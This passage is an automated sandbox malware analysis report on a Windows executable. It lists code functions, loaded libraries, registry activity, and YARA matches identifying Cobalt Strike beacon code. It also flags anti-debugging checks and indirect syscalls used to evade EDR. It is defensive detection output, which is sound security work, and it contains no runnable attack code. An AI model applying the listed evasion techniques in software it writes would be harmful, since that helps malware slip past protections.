Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014012DA14	0_2_000000014012DA14
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014013DA6C	0_2_000000014013DA6C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014014DB20	0_2_000000014014DB20
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001401D5B10	0_2_00000001401D5B10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001401CDB40	0_2_00000001401CDB40
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140135B30	0_2_0000000140135B30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140119B58	0_2_0000000140119B58
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400D1B84	0_2_00000001400D1B84
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400A1C28	0_2_00000001400A1C28
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014016DC24	0_2_000000014016DC24
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140105C80	0_2_0000000140105C80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140081C80	0_2_0000000140081C80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400F5CA8	0_2_00000001400F5CA8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140049CC4	0_2_0000000140049CC4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140109D40	0_2_0000000140109D40
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140065D58	0_2_0000000140065D58
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014015DD64	0_2_000000014015DD64
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400F5DE0	0_2_00000001400F5DE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140139F28	0_2_0000000140139F28
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140185F48	0_2_0000000140185F48
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140051F98	0_2_0000000140051F98
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140159F88	0_2_0000000140159F88
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140112058	0_2_0000000140112058
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140162048	0_2_0000000140162048
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014004A11C	0_2_000000014004A11C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140152154	0_2_0000000140152154
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400C21A1	0_2_00000001400C21A1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400BA1CC	0_2_00000001400BA1CC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400621E4	0_2_00000001400621E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014015E200	0_2_000000014015E200
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014008229C	0_2_000000014008229C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014014A2E4	0_2_000000014014A2E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001401DE314	0_2_00000001401DE314
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014016E3B0	0_2_000000014016E3B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140126490	0_2_0000000140126490
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140132500	0_2_0000000140132500
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001401724E8	0_2_00000001401724E8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400F6550	0_2_00000001400F6550
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001401FE5AC	0_2_00000001401FE5AC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400B65E4	0_2_00000001400B65E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140096610	0_2_0000000140096610
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014013E6C0	0_2_000000014013E6C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400CA6EC	0_2_00000001400CA6EC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001401A2710	0_2_00000001401A2710
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400C271C	0_2_00000001400C271C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014016A774	0_2_000000014016A774
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400E67A4	0_2_00000001400E67A4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400927C8	0_2_00000001400927C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001401DE848	0_2_00000001401DE848
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140156870	0_2_0000000140156870
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014006288C	0_2_000000014006288C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001401AA8BC	0_2_00000001401AA8BC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014005A8E4	0_2_000000014005A8E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140116954	0_2_0000000140116954
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400D29D8	0_2_00000001400D29D8

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: String function: 0000000140200750 appears 186 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: String function: 000000014003443C appears 45 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: String function: 00000001400064B0 appears 41 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: String function: 000000014002C650 appears 79 times

Sample file is different than original file name gathered from version info

Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Binary or memory string: OriginalFilename vs SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSBCommandLineScanner.exeJ vs SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Binary or memory string: OriginalFilenameSBCommandLineScanner.exeJ vs SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Yara signature match

Source: 0.3.SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe.2050000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.3.SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe.2050000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000002.3315812932.00000000020A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: Process Memory Space: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe PID: 6516, type: MEMORYSTR	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23

Source: classification engine

Classification label: mal92.troj.evad.winEXE@1/0@1/1

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Code function: 0_2_0000000140054158 GetVersionExW,wcschr,CoInitializeEx,CoCreateInstance,

0_2_0000000140054158

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Code function: 0_2_000000014005876C GetModuleHandleW,GetUserDefaultUILanguage,FindResourceExW,FindResourceW,LoadResource,GlobalAlloc,

0_2_000000014005876C

Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

ReversingLabs: Detection: 25%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Static file information: File size 3636736 > 1048576

Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x211c00

Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Static PE information: More than 200 imports for USER32.dll

Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: C:\Jenkins\workspace\consumer-12-0-1-service\bin\Release\x64\SBAMCommandLineScanner.pdb source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

PE file contains an invalid checksum

Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Static PE information: real checksum: 0x33725e should be: 0x3790fb

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Code function: 0_2_00000001401350C1 push rcx; ret

0_2_00000001401350C2

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140104C7C SetForegroundWindow,IsIconic,PostMessageW,IsIconic,	0_2_0000000140104C7C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140104C7C SetForegroundWindow,IsIconic,PostMessageW,IsIconic,	0_2_0000000140104C7C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140044F34 IsIconic,	0_2_0000000140044F34
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014013D3C0 IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,	0_2_000000014013D3C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014013D3C0 IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,	0_2_000000014013D3C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014013D3C0 IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,	0_2_000000014013D3C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400B1740 GetParent,IsIconic,GetParent,GetDlgCtrlID,	0_2_00000001400B1740
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140105A3C IsIconic,	0_2_0000000140105A3C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140099CE8 SetRectEmpty,RedrawWindow,ReleaseCapture,SetCapture,ReleaseCapture,SetCapture,GetParent,SendMessageW,UpdateWindow,GetParent,SendMessageW,IsWindow,IsIconic,IsZoomed,IsWindow,UpdateWindow,	0_2_0000000140099CE8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400C5D9C IsWindowVisible,IsIconic,	0_2_00000001400C5D9C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014013DFAC IsWindowVisible,IsWindowVisible,GetWindowRect,IsIconic,CopyRect,MonitorFromPoint,GetMonitorInfoW,CopyRect,CopyRect,SystemParametersInfoW,OffsetRect,GetSystemMetrics,GetSystemMetrics,	0_2_000000014013DFAC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014013E2CC IsIconic,PostMessageW,	0_2_000000014013E2CC

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

0_2_00000001401CDB40

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

API coverage: 1.5 %

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Code function: 0_2_000000014003C388 GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,

0_2_000000014003C388

Binary or memory string: Hyper-V RAW

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Code function: 0_3_01FC4060 LdrLoadDll,

0_3_01FC4060

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Code function: 0_2_00000001401D83C4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00000001401D83C4

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Code function: 0_2_00000001401CC9B0 GetLastError,IsDebuggerPresent,OutputDebugStringW,

0_2_00000001401CC9B0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Code function: 0_2_000000014000E540 GetProcessHeap,_Init_thread_footer,_Init_thread_footer,

0_2_000000014000E540

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Code function: 0_2_00000001401D83C4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00000001401D83C4

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	NtResumeThread: Indirect: 0x20A4F90	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	NtSetContextThread: Indirect: 0x20A3ACA	Jump to behavior
